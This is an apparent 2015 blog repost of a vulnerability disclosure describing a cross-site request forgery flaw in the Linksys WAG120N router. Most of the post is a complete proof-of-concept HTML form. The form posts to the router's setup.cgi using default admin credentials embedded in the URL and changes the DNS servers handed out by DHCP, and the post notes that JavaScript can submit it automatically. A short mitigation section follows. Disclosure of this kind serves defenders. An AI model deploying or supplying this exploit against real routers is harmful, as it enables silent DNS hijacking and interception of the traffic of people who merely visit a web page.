2015 m. rugpjūčio 25 d., antradienis

Cross site request forgery vulnerability in Linksys WAG120N

Hello all,

i want to share a problem that i found with Linksys router WAG120N. It
could be possible to modify router's configuration when a user visit a
webpage with an specific <form> (it is a similar problem that i sent
some days ago with Comtrend routers:
http://www.securityfocus.com/archive/1/536232).

Linksys WAG120N doesn’t accept the configuration if it is sent in the
url by method GET. In this case it is necessary to send the
configuration by method POST, so we will need to create an HTML with a
<form> with the parameters that we want to send to the router. We will
put router’s default values and we will change only user and password
and DNS addresses:

<html>
 <head>
 </head>
 <body>
 <form name="setup" method="POST"
action="http://admin:admin@192.168.1.1/setup.cgi">
 ...
 ...
 <INPUT type="text" name="PoeUserName" value="admin" maxLength="62" size="26" >
 <INPUT type="password" name="PoePasswd" value="admin" maxLength="43"
size="26" >
 ...
 ...
 <input type="hidden" name="c4_static_dns0_" value="1.2.3.4">
 <input type="hidden" name="c4_static_dns1_" value="5.6.7.8">
 <input type="hidden" name="c4_static_dns2_" value="9.10.11.12">
 ...
 ...
 <input type="submit">
 </form>
 </body>
</html>

If a user visit this HTML, when the form is submitted (it could be
submitted automatically with javascript) the router configuration is
changed (in this example DNS addresses given by DHCP are configured
but any configuration could be modified). The complete HTML code is in
the end.

I am almost sure other models of different manufacturers can be
configured in similar ways. From my point of view, routers interfaces
should only accept new incoming connections to a welcome page. In that
welcome page, a session key should be generated and kept while the
session is open. In this way a user could not go directly to critical
configuration menus. For example, a user could not go directly to the
menu to configure DNS addresses, because he must go to the welcome
page first, where a session key is generated, assigned and validated
when critical configurations are going to be changed.

Mitigation:

Internet Explorer doesn’t accept username and password in the URL of
the form action (I mean the syntax http://user:password@domain.com).
Currently chrome and firefox are accepting username and password in
the URL. I don’t know about other browsers.

Complete HTML:

<html>
 <head>
 </head>
 <body>
 <form name="setup" method="POST"
action="http://admin:admin@192.168.1.1/setup.cgi">
 <INPUT type="radio" name="wan_multiplex" value="llc">
 <INPUT type="radio" name="wan_multiplex" value="vc">
 <INPUT type="radio" name="pppoa_multiplex" value="llc">
 <INPUT type="radio" name="pppoa_multiplex" value="vc">
 <INPUT type="text" class="num" maxlength="5" size="5" value="" name="wan_pcr">
 <INPUT type="text" class="num" maxlength="5" size="5" value="" name="wan_scr">
 <INPUT type="radio" name="wan_autodetect" value="enable">
 <INPUT type="radio" name="wan_autodetect" value="disable">
 <INPUT type="text" class="num" maxlength="3" size="5" value="0" name="wan_vpi">
 <INPUT type="text" class="num" maxlength="5" size="5" value="38"
name="wan_vci">
 <INPUT type="radio" name="bridged_dhcpenable" value="dhcp">
 <INPUT type="radio" name="bridged_dhcpenable" value="fixedip">
 <INPUT type="text" name="wan_ip_1" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_ip_2" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_ip_3" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_ip_4" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_mask_1" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_mask_2" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_mask_3" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_mask_4" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_gw_1" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_gw_2" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_gw_3" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_gw_4" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_dns1_1" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_dns1_2" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_dns1_3" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_dns1_4" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_dns2_1" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_dns2_2" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_dns2_3" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="wan_dns2_4" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="PoeUserName" value="admin" maxLength="62" size="26" >
 <INPUT type="password" name="PoePasswd" value="admin" maxLength="43"
size="26" >
 <INPUT type="text" name="PoeService" value="" maxLength="43" size="26" >
 <INPUT type="radio" name="pppoeDODC" value="pppoeDODC">
 <INPUT type="text" class="num" name="poeIdleTime" value="5"
maxLength="4" size="4" >
 <INPUT type="radio" name="pppoeDODC" value="pppoeKA">
 <INPUT type="text" class="num" name="pppoeRedialTime" value="30"
maxLength="3" size="4" >
 <INPUT type="text" name="bpas_ip_1" value="" class="num"
maxlength="3" size="3" >
 <INPUT type="text" name="bpas_ip_2" value="" class="num"
maxlength="3" size="3" >
 <INPUT type="text" name="bpas_ip_3" value="" class="num"
maxlength="3" size="3" >
 <INPUT type="text" name="bpas_ip_4" value="" class="num"
maxlength="3" size="3" >
 <INPUT type="text" name="bpaUserName" value="" maxLength="62" size="26" >
 <INPUT type="password" name="bpaPasswd" value="" maxLength="43" size="26" >
 <INPUT type="radio" name="bpaDODC" value="bpaDODC">
 <INPUT type="text" name="bpaIdleTime" value="5" class="num"
maxLength="2" size="4" >
 <INPUT type="radio" name="bpaDODC" value="bpaKA">
 <INPUT type="text" name="bpaRedialTime" value="30" class="num"
maxLength="3" size="4" >
 <INPUT type="text" name="hostname" value="" maxlength="30" size="26">
 <INPUT type="text" name="domainname" value="" maxlength="62" size="26" >
 <INPUT type="text" name="mtu_size" value="1492" class="num"
maxLength="5" size="5" >
 <INPUT type="text" name="lan_ip_1" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="lan_ip_2" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="lan_ip_3" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="text" name="lan_ip_4" value="" class="ipnum"
maxlength="3" size="3">
 <INPUT type="radio" name="lan_dhcp" value="enable">
 <INPUT type="radio" name="lan_dhcp" value="disable">
 <INPUT type="radio" name="lan_dhcp" value="relay">
 <INPUT type="text" class="ipnum" maxLength="3" size="3" value=""
name="dhcpserver_ip_1">
 <INPUT type="text" class="ipnum" maxLength="3" size="3" value=""
name="dhcpserver_ip_2">
 <INPUT type="text" class="ipnum" maxLength="3" size="3" value=""
name="dhcpserver_ip_3">
 <INPUT type="text" class="ipnum" maxLength="3" size="3" value=""
name="dhcpserver_ip_4">
 <INPUT class="ipnum" maxlength="3" size="3" value="100" name="dhcp_start">
 <INPUT type="text" class="num" maxlength="3" size="3" value="50"
name="dhcp_num">
 <INPUT type="text" class="num" maxlength="4" size="4" value="0"
name="dhcp_lease">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="static_dns0_1">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="static_dns0_2">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="static_dns0_3">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="static_dns0_4">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="static_dns1_1">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="static_dns1_2">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="static_dns1_3">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="static_dns1_4">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="static_dns2_1">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="static_dns2_2">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="static_dns2_3">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="static_dns2_4">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="wan_wins_1">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="wan_wins_2">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="wan_wins_3">
 <INPUT type="text" class="ipnum" maxlength="3" size="3" value=""
name="wan_wins_4">
 <INPUT type="checkbox" name="auto_dls" value="auto_dls">
 <input type="hidden" name="h_ethwan_enable" value="disable">
 <input type="hidden" name="c4_wan_ip_" value="">
 <input type="hidden" name="c4_wan_mask_" value="">
 <input type="hidden" name="c4_wan_gw_" value="">
 <input type="hidden" name="c4_wan_dns1_" value="">
 <input type="hidden" name="c4_wan_dns2_" value="">
 <input type="hidden" name="c4_lan_ip_" value="192.168.1.1">
 <input type="hidden" name="c4_dhcpserver_ip_" value="">
 <input type="hidden" name="c4_static_dns0_" value="1.2.3.4">
 <input type="hidden" name="c4_static_dns1_" value="5.6.7.8">
 <input type="hidden" name="c4_static_dns2_" value="9.10.11.12">
 <input type="hidden" name="c4_wan_wins_" value="">
 <input type="hidden" name="c4_bpas_ip_" value="">
 <input type="hidden" name="h_bpaDODC" value="bpaDODC">
 <input type="hidden" name="h_wan_encapmode" value="pppoa">
 <input type="hidden" name="h_wan_multiplex" value="llc">
 <input type="hidden" name="h_pppoa_multiplex" value="llc">
 <input type="hidden" name="h_wan_qostype" value="ubr">
 <input type="hidden" name="h_dsl_mode" value="a">
 <input type="hidden" name="h_wan_autodetect" value="enable">
 <input type="hidden" name="h_bridged_dhcpenable" value="dhcp">
 <input type="hidden" name="h_pppoeDODC" value="pppoeDODC">
 <input type="hidden" name="h_mtu_type" value="auto">
 <input type="hidden" name="h_lan_mask" value="0">
 <input type="hidden" name="h_lan_dhcp" value="enable">
 <input type="hidden" name="h_time_zone" value="+0 2">
 <input type="hidden" name="h_auto_dls" value="disable">
 <input type="hidden" name="PppoeUserName" value="">
 <input type="hidden" name="PppoePasswd" value="">
 <input type="hidden" name="PppoeService" value="">
 <input type="hidden" name="PppoaUserName" value="admin">
 <input type="hidden" name="PppoaPasswd" value="admin">
 <input type="hidden" name="oldip" value="192.168.1.1">
 <input type="hidden" name="h_upgrade_langpkt" value="1">
 <input type="hidden" name="todo" value="save">
 <input type="hidden" name="this_file" value="Setup.htm">
 <input type="hidden" name="next_file" value="Setup.htm">
 <input type="hidden" name="message" value="">
 <input type="hidden" name="h_wps_cur_status" value="">
 <input type="submit">
 </form>
 </body>
</html>

Komentarų nėra:

Rašyti komentarą